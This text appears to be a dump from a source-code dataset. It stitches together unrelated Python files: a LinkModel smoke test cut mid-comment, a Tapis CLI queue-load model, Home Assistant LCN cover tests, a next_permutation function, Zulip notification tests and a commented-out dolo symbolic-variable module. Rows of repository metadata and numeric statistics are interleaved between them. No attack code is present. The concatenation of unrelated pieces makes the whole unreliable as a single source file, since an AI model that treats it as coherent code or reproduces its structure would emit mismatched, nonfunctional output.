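# (F.SYMBOLS: [batch, episode, padded_length] subword ids, F.ACTION_TYPE and
# F.HOUR: [batch, episode], F.NUM_POSTS: [batch]); it assumes the aid package's
# feature enum and layers are importable, as they are at the top of this module.
def _link_model_smoke_test(batch=2, episode=16, padded_length=32,
                           num_symbols=1000, num_action_types=8):
    model = LinkModel(num_symbols=num_symbols, num_action_types=num_action_types,
                      padded_length=padded_length, episode_len=episode)
    inputs = {
        F.SYMBOLS.value: tf.random.uniform([batch, episode, padded_length],
                                           maxval=num_symbols, dtype=tf.int32),
        F.ACTION_TYPE.value: tf.random.uniform([batch, episode],
                                               maxval=num_action_types, dtype=tf.int32),
        F.HOUR.value: tf.random.uniform([batch, episode], maxval=24, dtype=tf.int32),
        F.NUM_POSTS.value: tf.fill([batch], episode),
    }
    return model(inputs, training=False)              # embedding from the projection head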
| 42.65748
| 100
| 0.617628
| 1,319
| 10,835
| 4.801365
| 0.142532
| 0.025422
| 0.03316
| 0.028423
| 0.839571
| 0.819991
| 0.819991
| 0.819991
| 0.819991
| 0.819991
| 0
| 0.013535
| 0.290817
| 10,835
| 253
| 101
| 42.826087
| 0.810646
| 0.07725
| 0
| 0.893401
| 0
| 0
| 0.021861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020305
| false
| 0
| 0.060914
| 0
| 0.101523
| 0.005076
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fe8a383766a96a5d677b037865180afc9ce9960
| 1,888
|
py
|
Python
|
tapis_cli/commands/taccapis/v2/systems/models/system_queue_load.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 8
|
2020-10-18T22:48:23.000Z
|
2022-01-10T09:16:14.000Z
|
tapis_cli/commands/taccapis/v2/systems/models/system_queue_load.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 238
|
2019-09-04T14:37:54.000Z
|
2020-04-15T16:24:24.000Z
|
tapis_cli/commands/taccapis/v2/systems/models/system_queue_load.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 5
|
2019-09-20T04:23:49.000Z
|
2020-01-16T17:45:14.000Z
|
from tapis_cli.display import Verbosity
from tapis_cli.search import argtype, argmod
from .system import System
__all__ = ['SystemQueueLoad']
class SystemQueueLoad(System):
"""Model of the load on a Tapis system virtual queue
"""
SEARCH_ARGS = [
# JSON_field, type, verbosity, mods_allowed, default_mod, choices, override_option, searchable
("active", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("backlogged", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("pending", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("paused", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("processingInputs", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("stagingInputs", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("staging", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("submitting", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("queued", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("running", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("cleaningUp", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("archiving", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False)
]
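# --- illustrative note (added; not part of the original module) ---
# Each SEARCH_ARGS entry follows the field order documented in the comment at
# the top of the list; unpacking the first entry makes the mapping explicit.
def _describe_first_search_arg():
    (json_field, arg_type, verbosity, mods_allowed,
     default_mod, choices, override_option, searchable) = SystemQueueLoad.SEARCH_ARGS[0]
    return json_field, searchable                     # ('active', False)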
| 49.684211
| 98
| 0.690148
| 202
| 1,888
| 6.336634
| 0.252475
| 0.13125
| 0.215625
| 0.28125
| 0.7125
| 0.7125
| 0.7125
| 0.7125
| 0.7125
| 0.7125
| 0
| 0
| 0.193326
| 1,888
| 37
| 99
| 51.027027
| 0.840446
| 0.07839
| 0
| 0.354839
| 0
| 0
| 0.070358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.096774
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b47d8e56ca8555dedac851eaeaea507aa6fff4a
| 46
|
py
|
Python
|
BPPChecker/bpptools/checker/__init__.py
|
sansazhao/BPPChecker
|
3d722804c172deddaabeec8b3eea5062c37999f1
|
[
"MIT"
] | null | null | null |
BPPChecker/bpptools/checker/__init__.py
|
sansazhao/BPPChecker
|
3d722804c172deddaabeec8b3eea5062c37999f1
|
[
"MIT"
] | null | null | null |
BPPChecker/bpptools/checker/__init__.py
|
sansazhao/BPPChecker
|
3d722804c172deddaabeec8b3eea5062c37999f1
|
[
"MIT"
] | null | null | null |
from . import blchecker
from . import rchecker
| 23
| 23
| 0.804348
| 6
| 46
| 6.166667
| 0.666667
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 46
| 2
| 24
| 23
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8c6b814e525ff90cb95fe0151b2db21ed244172d
| 12,324
|
py
|
Python
|
tests/components/lcn/test_cover.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
tests/components/lcn/test_cover.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
tests/components/lcn/test_cover.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""Test for the LCN cover platform."""
from unittest.mock import patch
from pypck.inputs import ModStatusOutput, ModStatusRelays
from pypck.lcn_addr import LcnAddr
from pypck.lcn_defs import MotorReverseTime, MotorStateModifier
from homeassistant.components.cover import DOMAIN as DOMAIN_COVER
from homeassistant.components.lcn.helpers import get_device_connection
from homeassistant.const import (
ATTR_ENTITY_ID,
SERVICE_CLOSE_COVER,
SERVICE_OPEN_COVER,
SERVICE_STOP_COVER,
STATE_CLOSED,
STATE_CLOSING,
STATE_OPEN,
STATE_OPENING,
STATE_UNAVAILABLE,
)
from homeassistant.helpers import entity_registry as er
from .conftest import MockModuleConnection
async def test_setup_lcn_cover(hass, entry, lcn_connection):
"""Test the setup of cover."""
for entity_id in (
"cover.cover_outputs",
"cover.cover_relays",
):
state = hass.states.get(entity_id)
assert state is not None
assert state.state == STATE_OPEN
async def test_entity_attributes(hass, entry, lcn_connection):
"""Test the attributes of an entity."""
entity_registry = er.async_get(hass)
entity_outputs = entity_registry.async_get("cover.cover_outputs")
assert entity_outputs
assert entity_outputs.unique_id == f"{entry.entry_id}-m000007-outputs"
assert entity_outputs.original_name == "Cover_Outputs"
entity_relays = entity_registry.async_get("cover.cover_relays")
assert entity_relays
assert entity_relays.unique_id == f"{entry.entry_id}-m000007-motor1"
assert entity_relays.original_name == "Cover_Relays"
@patch.object(MockModuleConnection, "control_motors_outputs")
async def test_outputs_open(control_motors_outputs, hass, lcn_connection):
"""Test the outputs cover opens."""
state = hass.states.get("cover.cover_outputs")
state.state = STATE_CLOSED
# command failed
control_motors_outputs.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.UP, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state != STATE_OPENING
# command success
control_motors_outputs.reset_mock(return_value=True)
control_motors_outputs.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.UP, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_OPENING
@patch.object(MockModuleConnection, "control_motors_outputs")
async def test_outputs_close(control_motors_outputs, hass, lcn_connection):
"""Test the outputs cover closes."""
state = hass.states.get("cover.cover_outputs")
state.state = STATE_OPEN
# command failed
control_motors_outputs.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.DOWN, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state != STATE_CLOSING
# command success
control_motors_outputs.reset_mock(return_value=True)
control_motors_outputs.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.DOWN, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_CLOSING
@patch.object(MockModuleConnection, "control_motors_outputs")
async def test_outputs_stop(control_motors_outputs, hass, lcn_connection):
"""Test the outputs cover stops."""
state = hass.states.get("cover.cover_outputs")
state.state = STATE_CLOSING
# command failed
control_motors_outputs.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(MotorStateModifier.STOP)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_CLOSING
# command success
control_motors_outputs.reset_mock(return_value=True)
control_motors_outputs.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(MotorStateModifier.STOP)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state not in (STATE_CLOSING, STATE_OPENING)
@patch.object(MockModuleConnection, "control_motors_relays")
async def test_relays_open(control_motors_relays, hass, lcn_connection):
"""Test the relays cover opens."""
states = [MotorStateModifier.NOCHANGE] * 4
states[0] = MotorStateModifier.UP
state = hass.states.get("cover.cover_relays")
state.state = STATE_CLOSED
# command failed
control_motors_relays.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state != STATE_OPENING
# command success
control_motors_relays.reset_mock(return_value=True)
control_motors_relays.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_OPENING
@patch.object(MockModuleConnection, "control_motors_relays")
async def test_relays_close(control_motors_relays, hass, lcn_connection):
"""Test the relays cover closes."""
states = [MotorStateModifier.NOCHANGE] * 4
states[0] = MotorStateModifier.DOWN
state = hass.states.get("cover.cover_relays")
state.state = STATE_OPEN
# command failed
control_motors_relays.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state != STATE_CLOSING
# command success
control_motors_relays.reset_mock(return_value=True)
control_motors_relays.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_CLOSING
@patch.object(MockModuleConnection, "control_motors_relays")
async def test_relays_stop(control_motors_relays, hass, lcn_connection):
"""Test the relays cover stops."""
states = [MotorStateModifier.NOCHANGE] * 4
states[0] = MotorStateModifier.STOP
state = hass.states.get("cover.cover_relays")
state.state = STATE_CLOSING
# command failed
control_motors_relays.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_CLOSING
# command success
control_motors_relays.reset_mock(return_value=True)
control_motors_relays.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state not in (STATE_CLOSING, STATE_OPENING)
async def test_pushed_outputs_status_change(hass, entry, lcn_connection):
"""Test the outputs cover changes its state on status received."""
device_connection = get_device_connection(hass, (0, 7, False), entry)
address = LcnAddr(0, 7, False)
state = hass.states.get("cover.cover_outputs")
state.state = STATE_CLOSED
# push status "open"
input = ModStatusOutput(address, 0, 100)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_OPENING
# push status "stop"
input = ModStatusOutput(address, 0, 0)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state not in (STATE_OPENING, STATE_CLOSING)
# push status "close"
input = ModStatusOutput(address, 1, 100)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_CLOSING
async def test_pushed_relays_status_change(hass, entry, lcn_connection):
"""Test the relays cover changes its state on status received."""
device_connection = get_device_connection(hass, (0, 7, False), entry)
address = LcnAddr(0, 7, False)
states = [False] * 8
state = hass.states.get("cover.cover_relays")
state.state = STATE_CLOSED
# push status "open"
states[0:2] = [True, False]
input = ModStatusRelays(address, states)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_OPENING
# push status "stop"
states[0] = False
input = ModStatusRelays(address, states)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state not in (STATE_OPENING, STATE_CLOSING)
# push status "close"
states[0:2] = [True, True]
input = ModStatusRelays(address, states)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_CLOSING
async def test_unload_config_entry(hass, entry, lcn_connection):
"""Test the cover is removed when the config entry is unloaded."""
await hass.config_entries.async_unload(entry.entry_id)
assert hass.states.get("cover.cover_outputs").state == STATE_UNAVAILABLE
assert hass.states.get("cover.cover_relays").state == STATE_UNAVAILABLE
| 31.438776
| 76
| 0.725333
| 1,565
| 12,324
| 5.428115
| 0.075399
| 0.061212
| 0.045909
| 0.059329
| 0.849912
| 0.846969
| 0.826251
| 0.797999
| 0.773867
| 0.769041
| 0
| 0.005899
| 0.188413
| 12,324
| 391
| 77
| 31.519182
| 0.843431
| 0.027183
| 0
| 0.74552
| 0
| 0
| 0.089722
| 0.016709
| 0
| 0
| 0
| 0
| 0.207885
| 1
| 0
| false
| 0
| 0.032258
| 0
| 0.032258
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c6e95266f01e63c6daaf1af317023aaca4c382c
| 824
|
py
|
Python
|
correct_python_programs/next_permutation.py
|
PatrickShaw/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 22
|
2018-01-29T01:56:30.000Z
|
2022-03-21T12:25:40.000Z
|
correct_python_programs/next_permutation.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 31
|
2017-12-18T21:04:34.000Z
|
2022-02-21T07:38:09.000Z
|
correct_python_programs/next_permutation.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 19
|
2018-01-06T14:18:33.000Z
|
2022-03-21T12:25:43.000Z
|
def next_permutation(perm):
for i in range(len(perm) - 2, -1, -1):
if perm[i] < perm[i + 1]:
for j in range(len(perm) - 1, i, -1):
if perm[i] < perm[j]:
next_perm = list(perm)
next_perm[i], next_perm[j] = perm[j], perm[i]
next_perm[i + 1:] = reversed(next_perm[i + 1:])
return next_perm
"""
def next_permutation(perm):
for i in range(len(perm) - 2, -1, -1):
if perm[i] < perm[i + 1]:
for j in range(len(perm) - 1, i, -1):
if perm[j] > perm[i]:
next_perm = list(perm)
next_perm[i], next_perm[j] = perm[j], perm[i]
next_perm[i + 1:] = reversed(next_perm[i + 1:])
return next_perm
"""
| 35.826087
| 67
| 0.441748
| 118
| 824
| 2.966102
| 0.135593
| 0.2
| 0.102857
| 0.185714
| 0.997143
| 0.982857
| 0.965714
| 0.965714
| 0.965714
| 0.965714
| 0
| 0.032653
| 0.40534
| 824
| 22
| 68
| 37.454545
| 0.681633
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cbb4ec41d0315e171e0a7a3226626aa30ae80e5
| 6,454
|
py
|
Python
|
zerver/tests/test_notification_data.py
|
S-Abhishek/zulip
|
312989581840bb2f54651d9510be4c6ff57d6c1c
|
[
"Apache-2.0"
] | null | null | null |
zerver/tests/test_notification_data.py
|
S-Abhishek/zulip
|
312989581840bb2f54651d9510be4c6ff57d6c1c
|
[
"Apache-2.0"
] | null | null | null |
zerver/tests/test_notification_data.py
|
S-Abhishek/zulip
|
312989581840bb2f54651d9510be4c6ff57d6c1c
|
[
"Apache-2.0"
] | null | null | null |
from zerver.lib.test_classes import ZulipTestCase
class TestNotificationData(ZulipTestCase):
def test_is_push_notifiable(self) -> None:
sender_id = self.example_user("cordelia").id
# Boring case
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Notifiable cases for PMs, mentions, stream notifications
user_data = self.create_user_notifications_data_object()
self.assertTrue(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(flags=["mentioned"], mentioned=True)
self.assertTrue(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(
flags=["wildcard_mentioned"], wildcard_mention_notify=True
)
self.assertTrue(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(stream_push_notify=True)
self.assertTrue(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Now, test the `online_push_enabled` property
# Test no notifications when not idle
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=False)
)
# Test notifications are sent when not idle but `online_push_enabled = True`
user_data = self.create_user_notifications_data_object(online_push_enabled=True)
self.assertTrue(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=False)
)
# The following are hypothetical cases, since a private message can never have `stream_push_notify = True`.
# We just want to test the early (False) return patterns in these special cases:
# Message sender is muted.
user_data = self.create_user_notifications_data_object(
sender_is_muted=True,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
# Message sender is the user the object corresponds to.
user_data = self.create_user_notifications_data_object(
id=sender_id,
sender_is_muted=False,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
def test_is_email_notifiable(self) -> None:
sender_id = self.example_user("cordelia").id
# Boring case
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Notifiable cases for PMs, mentions, stream notifications
user_data = self.create_user_notifications_data_object()
self.assertTrue(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(flags=["mentioned"], mentioned=True)
self.assertTrue(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(
flags=["wildcard_mentioned"], wildcard_mention_notify=True
)
self.assertTrue(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(stream_email_notify=True)
self.assertTrue(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Test no notifications when not idle
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=False)
)
# The following are hypothetical cases, since a private message can never have `stream_email_notify = True`.
# We just want to test the early (False) return patterns in these special cases:
# Message sender is muted.
user_data = self.create_user_notifications_data_object(
sender_is_muted=True,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
# Message sender is the user the object corresponds to.
user_data = self.create_user_notifications_data_object(
id=sender_id,
sender_is_muted=False,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
def test_is_notifiable(self) -> None:
# This is just for coverage purposes. We've already tested all scenarios above,
# and `is_notifiable` is a simple OR of the email and push functions.
sender_id = self.example_user("cordelia").id
user_data = self.create_user_notifications_data_object()
self.assertTrue(
user_data.is_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
| 41.909091
| 116
| 0.67555
| 771
| 6,454
| 5.303502
| 0.114137
| 0.080215
| 0.068476
| 0.079237
| 0.913671
| 0.912693
| 0.912693
| 0.904622
| 0.904622
| 0.892639
| 0
| 0
| 0.250697
| 6,454
| 153
| 117
| 42.183007
| 0.845534
| 0.155562
| 0
| 0.701754
| 0
| 0
| 0.034248
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.026316
| false
| 0
| 0.008772
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
507000aa819cf78a53dc321aad936b7cf62f9625
| 10,314
|
py
|
Python
|
trash/dolo/misc/symbolic_interactive.py
|
zhuang13atJHU/dolo
|
a40c82f3c87e7a051b56fb9d1a0d646433481167
|
[
"BSD-2-Clause"
] | 1
|
2018-12-27T05:32:04.000Z
|
2018-12-27T05:32:04.000Z
|
trash/dolo/misc/symbolic_interactive.py
|
zhuang13atJHU/dolo
|
a40c82f3c87e7a051b56fb9d1a0d646433481167
|
[
"BSD-2-Clause"
] | null | null | null |
trash/dolo/misc/symbolic_interactive.py
|
zhuang13atJHU/dolo
|
a40c82f3c87e7a051b56fb9d1a0d646433481167
|
[
"BSD-2-Clause"
] | 1
|
2019-12-27T19:46:35.000Z
|
2019-12-27T19:46:35.000Z
|
import inspect
import re
from trash.dolo.symbolic.symbolic import Variable,Parameter,Shock,IndexedSymbol
#def set_variables(s,names_dict={}):
# """
# Creates symbolic variable with the name *s*.
# -- a string, either a single variable name, or
# a space separated list of variable names, or
# a list of variable names.
# NOTE: The new variable is both returned and automatically injected into
# the parent's *global* namespace. It's recommended not to use "var" in
# library code, it is better to use symbols() instead.
# EXEMPLES:
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# res = []
# for t in s:
# # skip empty stringG
# if not t:
# continue
# if t in names_dict:
# latex_name = names_dict[t]
# else:
# latex_name = None
# sym = Variable(t,0,latex_name)
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['variables'] = res
# return res
# finally:
# del frame
#
#def add_variables(s,latex_names=None):
# """
# The same as set_variables but doesn't replace the existing variables.
# """
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split(' ', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t=s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names == None:
# sym = Variable(t,0)
# else:
# sym = Variable(t,0,latex_name=sl[i])
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['variables'] += res
# return res
# finally:
# del frame
#
#def set_shocks(s,latex_names=None,names_dict={}):
# """
# Creates symbolic variable with the name *s*.
# -- a string, either a single variable name, or
# a space separated list of variable names, or
# a list of variable names.
# NOTE: The new variable is both returned and automatically injected into
# the parent's *global* namespace. It's recommended not to use "var" in
# library code, it is better to use symbols() instead.
# EXAMPLES:
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split(' ', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t = s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names != None:
# sym = Shock(t,0,latex_name=sl[i])
# elif t in names_dict:
# sym = Shock(t,0,latex_name=names_dict[t])
# else:
# sym = Shock(t,0)
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['shocks'] = res
# return res
# finally:
# del frame
#
#def add_shocks(s,latex_names=None):
# """
# The same as set_shocks but doesn't replace the existing variables.
# """
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split(' ', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t=s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names == None:
# sym = Shock(t,0)
# else:
# sym = Shock(t,0,latex_name=sl[i])
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['shocks'] += res
# return res
# finally:
# del frame
#
